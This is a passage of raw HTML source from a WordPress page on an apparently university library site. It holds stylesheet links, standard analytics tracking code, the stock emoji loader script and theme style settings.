CINXE.COM
background-bi – ptsl
<!DOCTYPE html> <html class="html" lang="en-US"> <head> <meta charset="UTF-8"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>background-bi – ptsl</title> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <link rel="alternate" href="https://www.ukm.my/ptsl/?page_id=247" hreflang="en" /> <link rel="alternate" href="https://www.ukm.my/ptsl/?page_id=1304&lang=ms" hreflang="ms" /> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//use.fontawesome.com' /> <link rel="alternate" type="application/rss+xml" title="ptsl » Feed" href="https://www.ukm.my/ptsl/?feed=rss2" /> <link rel="alternate" type="application/rss+xml" title="ptsl » Comments Feed" href="https://www.ukm.my/ptsl/?feed=comments-rss2" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v9.2.4 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script src="//www.googletagmanager.com/gtag/js?id=G-C4EM2W17NL" data-cfasync="false" data-wpfc-render="false" async></script> <script data-cfasync="false" data-wpfc-render="false"> var mi_version = '9.2.4'; var mi_track_user = true; var mi_no_track_reason = ''; var MonsterInsightsDefaultLocations = {"page_location":"https:\/\/www.ukm.my\/ptsl\/?page_id=247"}; if ( typeof MonsterInsightsPrivacyGuardFilter === 'function' ) { var MonsterInsightsLocations = (typeof MonsterInsightsExcludeQuery === 'object') ? MonsterInsightsPrivacyGuardFilter( MonsterInsightsExcludeQuery ) : MonsterInsightsPrivacyGuardFilter( MonsterInsightsDefaultLocations ); } else { var MonsterInsightsLocations = (typeof MonsterInsightsExcludeQuery === 'object') ? MonsterInsightsExcludeQuery : MonsterInsightsDefaultLocations; } var disableStrs = [ 'ga-disable-G-C4EM2W17NL', ]; /* Function to detect opted out users */ function __gtagTrackerIsOptedOut() { for (var index = 0; index < disableStrs.length; index++) { if (document.cookie.indexOf(disableStrs[index] + '=true') > -1) { return true; } } return false; } /* Disable tracking if the opt-out cookie exists. */ if (__gtagTrackerIsOptedOut()) { for (var index = 0; index < disableStrs.length; index++) { window[disableStrs[index]] = true; } } /* Opt-out function */ function __gtagTrackerOptout() { for (var index = 0; index < disableStrs.length; index++) { document.cookie = disableStrs[index] + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStrs[index]] = true; } } if ('undefined' === typeof gaOptout) { function gaOptout() { __gtagTrackerOptout(); } } window.dataLayer = window.dataLayer || []; window.MonsterInsightsDualTracker = { helpers: {}, trackers: {}, }; if (mi_track_user) { function __gtagDataLayer() { dataLayer.push(arguments); } function __gtagTracker(type, name, parameters) { if (!parameters) { parameters = {}; } if (parameters.send_to) { __gtagDataLayer.apply(null, arguments); return; } if (type === 'event') { parameters.send_to = monsterinsights_frontend.v4_id; var hookName = name; if (typeof parameters['event_category'] !== 'undefined') { hookName = parameters['event_category'] + ':' + name; } if (typeof MonsterInsightsDualTracker.trackers[hookName] !== 'undefined') { MonsterInsightsDualTracker.trackers[hookName](parameters); } else { __gtagDataLayer('event', name, parameters); } } else { __gtagDataLayer.apply(null, arguments); } } __gtagTracker('js', new Date()); __gtagTracker('set', { 'developer_id.dZGIzZG': true, }); if ( MonsterInsightsLocations.page_location ) { __gtagTracker('set', MonsterInsightsLocations); } __gtagTracker('config', 'G-C4EM2W17NL', {"forceSSL":"true","link_attribution":"true"} ); window.gtag = __gtagTracker; (function () { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ /* ga and __gaTracker compatibility shim. */ var noopfn = function () { return null; }; var newtracker = function () { return new Tracker(); }; var Tracker = function () { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = function () { var args = Array.prototype.slice.call(arguments); args.unshift('send'); __gaTracker.apply(null, args); }; var __gaTracker = function () { var len = arguments.length; if (len === 0) { return; } var f = arguments[len - 1]; if (typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function') { if ('send' === arguments[0]) { var hitConverted, hitObject = false, action; if ('event' === arguments[1]) { if ('undefined' !== typeof arguments[3]) { hitObject = { 'eventAction': arguments[3], 'eventCategory': arguments[2], 'eventLabel': arguments[4], 'value': arguments[5] ? arguments[5] : 1, } } } if ('pageview' === arguments[1]) { if ('undefined' !== typeof arguments[2]) { hitObject = { 'eventAction': 'page_view', 'page_path': arguments[2], } } } if (typeof arguments[2] === 'object') { hitObject = arguments[2]; } if (typeof arguments[5] === 'object') { Object.assign(hitObject, arguments[5]); } if ('undefined' !== typeof arguments[1].hitType) { hitObject = arguments[1]; if ('pageview' === hitObject.hitType) { hitObject.eventAction = 'page_view'; } } if (hitObject) { action = 'timing' === arguments[1].hitType ? 'timing_complete' : hitObject.eventAction; hitConverted = mapArgs(hitObject); __gtagTracker('event', action, hitConverted); } } return; } function mapArgs(args) { var arg, hit = {}; var gaMap = { 'eventCategory': 'event_category', 'eventAction': 'event_action', 'eventLabel': 'event_label', 'eventValue': 'event_value', 'nonInteraction': 'non_interaction', 'timingCategory': 'event_category', 'timingVar': 'name', 'timingValue': 'value', 'timingLabel': 'event_label', 'page': 'page_path', 'location': 'page_location', 'title': 'page_title', 'referrer' : 'page_referrer', }; for (arg in args) { if (!(!args.hasOwnProperty(arg) || !gaMap.hasOwnProperty(arg))) { hit[gaMap[arg]] = args[arg]; } else { hit[arg] = args[arg]; } } return hit; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = newtracker; __gaTracker.getByName = newtracker; __gaTracker.getAll = function () { return []; }; __gaTracker.remove = noopfn; __gaTracker.loaded = true; window['__gaTracker'] = __gaTracker; })(); } else { console.log(""); (function () { function __gtagTracker() { return null; } window['__gtagTracker'] = __gtagTracker; window['gtag'] = __gtagTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.ukm.my\/ptsl\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); </script> <link rel='stylesheet' id='hfe-widgets-style-css' href='https://www.ukm.my/ptsl/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=2.2.0' media='all' /> <style id='wp-emoji-styles-inline-css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style id='classic-theme-styles-inline-css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='wpah-front-styles-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/css/wp-accessibility-helper.min.css?ver=0.5.9.4' media='all' /> <link rel='stylesheet' id='wpvrfontawesome-css' href='https://use.fontawesome.com/releases/v6.5.1/css/all.css?ver=8.5.17' media='all' /> <link rel='stylesheet' id='panellium-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/css/pannellum.css?ver=1' media='all' /> <link rel='stylesheet' id='videojs-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/css/video-js.css?ver=1' media='all' /> <link rel='stylesheet' id='videojs-vr-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.css?ver=1' media='all' /> <link rel='stylesheet' id='owl-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/css/owl.carousel.css?ver=8.5.17' media='all' /> <link rel='stylesheet' id='wpvr-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/css/wpvr-public.css?ver=8.5.17' media='all' /> <link rel='stylesheet' id='eac-frontend-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/css/eac-frontend.min.css?ver=1.0.0' media='all' /> <link rel='stylesheet' id='eac-fancybox-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/css/jquery.fancybox.min.css?ver=3.5.7' media='print' onload="this.onload=null;this.media='all'" /> <link rel='stylesheet' id='hfe-style-css' href='https://www.ukm.my/ptsl/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=2.2.0' media='all' /> <link rel='stylesheet' id='elementor-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.35.0' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='elementor-post-9-css' href='https://www.ukm.my/ptsl/wp-content/uploads/elementor/css/post-9.css?ver=1741241317' media='all' /> <link rel='stylesheet' id='cpel-language-switcher-css' href='https://www.ukm.my/ptsl/wp-content/plugins/connect-polylang-elementor/assets/css/language-switcher.min.css?ver=2.4.5' media='all' /> <link rel='stylesheet' id='widget-image-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='widget-heading-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='widget-divider-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-divider.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='widget-spacer-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-spacer.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='widget-text-editor-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='e-shapes-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/conditionals/shapes.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='widget-accordion-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-accordion.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='widget-social-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='e-apple-webkit-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/conditionals/apple-webkit.min.css?ver=3.27.5' media='all' /> <link rel='stylesheet' id='elementor-post-247-css' href='https://www.ukm.my/ptsl/wp-content/uploads/elementor/css/post-247.css?ver=1734915874' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/fonts/fontawesome/css/all.min.css?ver=6.7.2' media='all' /> <link rel='stylesheet' id='simple-line-icons-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/css/third/simple-line-icons.min.css?ver=2.4.0' media='all' /> <link rel='stylesheet' id='oceanwp-style-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/css/style.min.css?ver=4.0.5' media='all' /> <link rel='stylesheet' id='hfe-elementor-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.34.0' media='all' /> <link rel='stylesheet' id='hfe-icons-list-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css?ver=3.24.3' media='all' /> <link rel='stylesheet' id='hfe-social-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24.0' media='all' /> <link rel='stylesheet' id='hfe-social-share-icons-brands-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='hfe-social-share-icons-fontawesome-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='hfe-nav-menu-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='eael-general-css' href='https://www.ukm.my/ptsl/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/css/view/general.min.css?ver=6.1.2' media='all' /> <link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPlayfair+Display%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPT+Sans+Caption%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPT+Sans%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7.2' media='all' /> <link rel='stylesheet' id='elementor-icons-shared-0-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-solid-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-brands-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3' media='all' /> <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><!--n2css--><!--n2js--><script src="https://www.ukm.my/ptsl/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=9.2.4" id="monsterinsights-frontend-script-js" async data-wp-strategy="async"></script> <script data-cfasync="false" data-wpfc-render="false" id='monsterinsights-frontend-script-js-extra'>var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,pdf,ppt,zip,xls,docx,pptx,xlsx","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"https:\/\/www.ukm.my\/ptsl","hash_tracking":"false","v4_id":"G-C4EM2W17NL"};</script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script id="jquery-js-after"> !function($){"use strict";$(document).ready(function(){$(this).scrollTop()>100&&$(".hfe-scroll-to-top-wrap").removeClass("hfe-scroll-to-top-hide"),$(window).scroll(function(){$(this).scrollTop()<100?$(".hfe-scroll-to-top-wrap").fadeOut(300):$(".hfe-scroll-to-top-wrap").fadeIn(300)}),$(".hfe-scroll-to-top-wrap").on("click",function(){$("html, body").animate({scrollTop:0},300);return!1})})}(jQuery); </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/pannellum.js?ver=1" id="panellium-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/libpannellum.js?ver=1" id="panelliumlib-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/video.js?ver=1" id="videojs-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1" id="videojsvr-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/videojs-pannellum-plugin.js?ver=1" id="panelliumvid-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/owl.carousel.js?ver=6.7.2" id="owl-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/jquery.cookie.js?ver=1" id="jquery_cookie-js"></script> <link rel="https://api.w.org/" href="https://www.ukm.my/ptsl/index.php?rest_route=/" /><link rel="alternate" title="JSON" type="application/json" href="https://www.ukm.my/ptsl/index.php?rest_route=/wp/v2/pages/247" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.ukm.my/ptsl/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.2" /> <link rel="canonical" href="https://www.ukm.my/ptsl/?page_id=247" /> <link rel='shortlink' href='https://www.ukm.my/ptsl/?p=247' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://www.ukm.my/ptsl/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fwww.ukm.my%2Fptsl%2F%3Fpage_id%3D247" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" 